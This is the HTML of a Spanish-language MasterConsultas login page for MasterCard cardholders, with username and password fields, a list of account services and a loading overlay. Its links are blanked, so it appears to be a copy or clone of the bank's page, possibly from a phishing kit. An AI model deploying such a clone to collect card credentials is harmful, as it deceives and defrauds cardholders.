
<html class="no-js" lang="en"> 
<meta http-equiv="Cache-Control" content="no-cache, no-store" />
<meta http-equiv="Pragma" content="no-cache" />
<meta http-equiv="Expires" content="0" />
<head>


	
	<link rel="stylesheet" href="../css/style.css"/>
</head>
<body class="home nolog">
	<header>
<div id="header" class="nolog">
  <div class="header-content">
    <h1><a href="#">MasterConsultas</a></h1>
  </div>
</div>
</header> 	
	<meta http-equiv="Cache-Control" content="no-cache, no-store" />
<meta http-equiv="Pragma" content="no-cache" />
<meta http-equiv="Expires" content="0" />


 
<div id="container" class="clearfix">
  <div class="content nolog">
    <h3 class="title">INICIO DE SESIÓN // <strong>REGISTRACIÓN</strong></h3>
    <div class="combo-registro">
      <div class="registrado">
        <form id="loginForm" name="loginForm" action="/" method="post" class="form-login"  >
          <fieldset>
            <input style="display:none">
			<input type="password" style="display:none">
            <p style="padding-bottom: 12px !important;">
              	<input type="text" name="username" maxlength="12" required value="" id="username" class="usuario" placeholder="Nombre de usuario" autocomplete="off"/>
              
            </p>
            <p style="padding-bottom: 12px !important;">
				<input type="password" name="password" id="password"  required class="pass" placeholder="Contraseña" autocomplete="off"/>
				
			</p>
           	<input type="submit" id="submitLogin" value="Ingresar" class="btn-224px" style="border:none;" clearForm="true" button="true" blocksui="true"/>

            <p class="nota">
	            <a href="#" id="keyboardAnchorId" >
	            	
	            </a>
            </p>
            <div id="kbtable" align="left" style="position:absolute;float:right;left:176px;top:396px; display:none" ></div>
          </fieldset>
          
        </form>




        
      </div>
     

      
    </div>
    <div class="combo-txt">
      <div class="txt">
	    <p>Acceda aquí al detalle completo de todas las operaciones que realiza con sus tarjetas MasterCard.</p>
	    <ul>
	      <li>Verifique sus últimos movimientos, liquidaciones y resúmenes de cuenta.</li>
	      <li>Adhi&eacute;rase al d&eacute;bito automático de sus facturas.</li>
	      <li>Chequee su límite de compra, cierre y vencimientos.</li>
	      <li>Efectúe el pago de servicios e impuestos.</li>
	      <li>Recargue cr&eacute;dito a sus celulares las 24 horas del día.</li>
	    </ul>
      </div>
      <ul class="btns">
        <li><a href="#" class="btn01" target="_blank"></a></li>
        <li><a href="#" class="btn02" target="_blank"></a></li>
        <li><a href="#" class="btn03" target="_blank"></a></li>       
      </ul>
    </div>
  </div>
</div>
	




	
	
<div id='wait' style='display:none;'>
	<div class="blockUI blockOverlay" style="z-index: 1000; border: medium none; margin: 0px; padding: 0px; width: 100%; height: 100%; top: 0px; left: 0px; background-color: rgb(0, 0, 0); opacity: 0.6; cursor: wait; position: fixed;"></div>
<div class="blockUI blockMsg blockPage" style="z-index: 1001; position: fixed; padding: 0px; margin: 0px; width: 30%; top: 40%; left: 35%; text-align: center; color: rgb(0, 0, 0); border: 3px solid rgb(170, 170, 170); background-color: rgb(255, 255, 255); cursor: wait;"><h1>Espere por favor ...</h1></div>
	</div>

</body>
</html>